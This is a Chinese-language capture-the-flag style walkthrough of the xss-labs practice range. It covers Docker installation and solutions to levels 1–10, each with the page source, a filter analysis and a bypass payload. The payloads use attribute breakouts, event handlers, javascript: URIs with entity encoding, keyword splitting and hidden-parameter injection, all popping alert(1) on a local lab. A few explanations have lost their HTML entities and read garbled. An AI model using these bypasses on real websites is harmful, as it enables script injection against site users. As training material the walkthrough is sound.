xss-labs靶场安装+通关（1）

最新推荐文章于 2025-10-26 18:29:31 发布

原创最新推荐文章于 2025-10-26 18:29:31 发布 · 670 阅读

21 ·

CC 4.0 BY-SA版权

文章标签：

#xss

CTF题解专栏收录该内容

19 篇文章

订阅专栏

昨天我已经通关DVWA靶场，感觉还是可以的，手感火热，今天继续复习靶场，本来想写sql-labs靶场的，但是感觉有点多，就不写，今天完成的是xss-labs靶场，这个靶场还是挺简单的，今天先分享前面10关，明天更新剩下的。来，走起。

一、xss-labs安装

这里我们使用docker安装靶场，简单又快，使用命令拉取镜像

docker pull c0ny1/xss-challenge-tour

然后使用如下命令运行

docker run -dt --name xss -p 8082:80 --rm c0ny1/xss-challenge-tour

通过IP地址加端口进行访问，如下图所示

二、靶场通关

1、level1

第一关直接在url处将test改为以下语句

<script>alert(1)</script>

2、level2

有个输入框，输入语句先尝试一下

查看源码进行分析

源码分析，script>alert(1)</script> 仅作为input标签的属性值存在，而非独立的 HTML 标签。浏览器会将属性值内的内容视为普通文本，不会解析执行其中的脚本，因此无法触发弹窗。

如何绕过：Level2 通常无标签 / 字符过滤（如未过滤<、>、"等），仅存在 “输出位置在属性内” 的限制，突破input标签的value属性限制，让恶意脚本成为独立的 HTML 元素或触发事件的属性。具体逻辑：闭合value属性：用双引号 " 结束value的取值范围（原 HTML 中value="..."，输入"后变为value=""）。

使用命令如下

"><script>alert(1)</script>

3、level3

还是按照上面的思路

源码分析


<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level4.php?keyword=try harder!"; 
}
</script>
<title>欢迎来到level3</title>
</head>
<body>
<h1 align=center>欢迎来到level3</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center>
<form action=level3.php method=GET>
<input name=keyword  value='&lt;script&gt;alert(1)&lt;/script&gt;'>
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level3.png></center>
<h3 align=center>payload的长度:25</h3></body>
</html>

value属性使用单引号' 包裹（而非双引号"），这是闭合逻辑的关键变化。
过滤特征：原 Payload <script>alert(1)</script> 被转义为 <script>alert(1)</script>，说明 < 和 > 被 HTML 实体编码（<→<，>→>），直接使用<script>标签会失效
绕过思路：闭合value属性：用单引号'结束value的取值范围（原 HTML 中value='...'，输入'后变为value=''）,添加事件属性：在input标签内直接添加事件触发脚本（如onclick、onmouseover等），这类属性不需要<和>，可绕过标签过滤

这里我们使用事件来完成，使用语句如下（具体事件我就不再介绍）

' onclick='alert(1)

然后点击输入框，即可完成

4、level4

直接分析源码


<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level5.php?keyword=find a way out!"; 
}
</script>
<title>欢迎来到level4</title>
</head>
<body>
<h1 align=center>欢迎来到level4</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center>
<form action=level4.php method=GET>
<input name=keyword  value="scriptalert(1)/script">
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level4.png></center>
<h3 align=center>payload的长度:21</h3></body>
</html>

<script>alert(1)</script> 被处理为 scriptalert(1)/script，可见 < 和 > 被直接删除（而非转义），导致<script>标签结构被破坏，无法正常使用。

由于 < 和 > 被过滤，无法使用<script>等标签，使用 Level3 的事件触发型 XSS思路，但适配双引号包裹的属性：闭合value属性：用双引号"结束value的取值范围（原 HTML 中value="..."，输入"后变为value=""）。注入事件属性：在input标签内添加事件触发脚本（如onclick、onmouseover），这类属性不需要<和>，可避开过滤。

使用语句如下

" onclick="alert(1)

点击输入框，即可完成

5、level5

直接分析源码


<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level6.php?keyword=break it out!"; 
}
</script>
<title>欢迎来到level5</title>
</head>
<body>
<h1 align=center>欢迎来到level5</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center>
<form action=level5.php method=GET>
<input name=keyword  value="<scr_ipt>alert(1)</script>">
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level5.png></center>
<h3 align=center>payload的长度:26</h3></body>
</html>

<script>alert(1)</script> 被处理为 <scr_ipt>alert(1)</script>，可见 script关键词被针对性破坏插入下划线_），导致<script>标签失效；同时，发现事件属性（如onclick）中的 "on" 也可能被过滤（例如转为o_n），常规事件触发方式失效。

由于script标签和on类事件被过滤，需转向不依赖这两类关键词的触发方式，利用 HTML 标签的href属性结合javascript协议：闭合value属性与input标签：用"结束value属性，再用>闭合input标签，使后续内容成为独立 HTML 元素。使用<a>标签 +javascript协议：<a>标签的href属性支持javascript:伪协议，可直接执行脚本，且 "javascript" 中的 "script" 可通过大小写混淆绕过过滤

使用语句如下

"><a href="Javascript:alert(1)">点击触发</a>

然后点击那个点击触发即可

6、level6

直接分析源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level7.php?keyword=move up!"; 
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center>
<form action=level6.php method=GET>
<input name=keyword  value="<scr_ipt>alert(1)</script>">
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level6.png></center>
<h3 align=center>payload的长度:26</h3></body>
</html>

Payload <script>alert(1)</script> 被处理为 <scr_ipt>alert(1)</script>，script关键词被强制破坏插入下划线_）。猜测使用大小写混淆绕过。同时也要闭合前面的双引号

直接使用如下语句绕过

"><SCRIPT>alert(1)</SCRIPT>

7、level7

分析源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level8.php?keyword=nice try!"; 
}
</script>
<title>欢迎来到level7</title>
</head>
<body>
<h1 align=center>欢迎来到level7</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center>
<form action=level7.php method=GET>
<input name=keyword  value="<>alert(1)</>">
<input type=submit name=submit value=搜索 />
</form>
</center><center><img src=level7.png></center>
<h3 align=center>payload的长度:13</h3></body>
</html>

<script>alert(1)</script> 被处理为 <>alert(1)</>，script关键词被直接删除，导致<script>标签被剥离为<>。

过滤规则通常只会单次匹配并删除关键词，因此将 “script” 拆分为两部分，中间插入 “script”，过滤后两部分会自动拼接成完整的 “script”。例如：scrscriptipt → 过滤删除中间的 “script” → 剩余script。同时，需先闭合value属性和input标签。

使用语句如下

"""><scrscriptipt>alert(1)</scrscriptipt>

8、level8

直接分析源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level9.php?keyword=not bad!"; 
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<center>
<form action=level8.php method=GET>
<input name=keyword  value="&lt;script&gt;alert(1)&lt;/script&gt;">
<input type=submit name=submit value=添加友情链接 />
</form>
</center><center><BR><a href="<scr_ipt>alert(1)</scr_ipt>">友情链接</a></center><center><img src=level8.jpg></center>
<h3 align=center>payload的长度:27</h3></body>
</html>

<script>alert(1)</script> 被处理为 <scr_ipt>alert(1)</scr_ipt>，精准检测 “script” 关键词，并通过插入下划线_破坏标签结构；对 “javascript” 中的 “script” 同样生效（若直接输入javascript:alert(1)，会被处理为javascr_ipt:alert(1)，失效）；但是未过滤 HTML 实体编码

HTML 中，<a>标签的href属性支持HTML 实体编码（如s会被浏览器自动解析为s），且解析优先级高于关键词过滤 —— 利用这一特性可绕过 “script” 检测。

href属性支持javascript:伪协议（如href="javascript:alert(1)"），点击链接时会执行协议后的脚本，无需依赖<script>标签。

针对 “script” 关键词过滤，将 “javascript” 中 “script” 部分的某个字符（如s）替换为 HTML 实体编码（如s的十进制编码s、十六进制编码s）。过滤规则无法识别编码后的字符；但浏览器渲染时会自动将编码解析为原字符，恢复javascript:协议的有效性。

使用语句如下

java&#115;cript:alert(1)

然后点击友情链接

9、level9

分析源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level10.php?keyword=well done!"; 
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<center>
<form action=level9.php method=GET>
<input name=keyword  value="&lt;script&gt;alert(1)&lt;/script&gt;">
<input type=submit name=submit value=添加友情链接 />
</form>
</center><center><BR><a href="您的链接不合法？有没有！">友情链接</a></center><center><img src=level9.png></center>
<h3 align=center>payload的长度:27</h3></body>
</html>

script关键词过滤（如<script>会被破坏）；新增合法性校验：若输入内容不包含http://等合法协议前缀，会被标记为 “不合法”，无法作为有效href值。

绕过需同时满足两个条件：通过合法性校验：在 Payload 中包含http://（或https://），让系统认为是合法链接；绕过script过滤并执行脚本：利用javascript:协议 + HTML 实体编码，在合法 URL 中嵌入可执行脚本，通过注释符号//忽略http://后的冗余内容。

使用语句如下

java&#115;cript:alert(1)//http://

合法校验：包含http://，满足系统对 “合法链接” 的判断，避免被标记为 “不合法”；
执行：
- javascript：s是s的 HTML 实体编码，浏览器解析后恢复为javascript，绕过script关键词过滤；
- //：JavaScript 注释符号，忽略后续的http://（避免干扰脚本执行）；

然后点击友情链接

10、level10

没有输入框，直接在url中添加，分析源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level11.php?keyword=good job!"; 
}
</script>
<title>欢迎来到level10</title>
</head>
<body>
<h1 align=center>欢迎来到level10</h1>
<h2 align=center>没有找到和&lt;script&gt;alert()&lt;/script&gt;相关的结果.</h2><center>
<form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
</form>
</center><center><img src=level10.png></center>
<h3 align=center>payload的长度:24</h3></body>
</html>

页面包含 3 个隐藏的<input>标签（t_link、t_history、t_sort），类型为hidden（不显示在页面上），value属性初始为空。用户输入的keyword参数仅作为 “未找到结果” 的提示文本，且被 HTML 实体编码（<→<等）。但是，隐藏的input标签的name属性（t_link、t_history、t_sort）可能是可控参数—— 即可以通过 URL 传入对应参数值，这些值会被填充到value属性中。例如，若传入?t_sort=test，可能导致<input name="t_sort" value="test" type="hidden">。

绕过思路，定位可控参数：测试t_link、t_history、t_sort三个参数，确认哪个参数的输入会被直接填充到value属性中（通常t_sort是目标）。构造属性：通过参数值闭合value属性，同时修改type为text（使输入框可见），并添加事件属性（如onclick），让脚本可被用户交互触发。

修改keyword的参数，使用语句如下

keyword=test&t_sort=%22%20type=%22text%22%20onclick=%22alert(1)

执行思路，向 URL 添加t_sort参数并编码 Payload，访问 URL 后，页面会显示一个文本输入框（因type="text"），点击该输入框即触发onclick事件。

然后点击输入框即可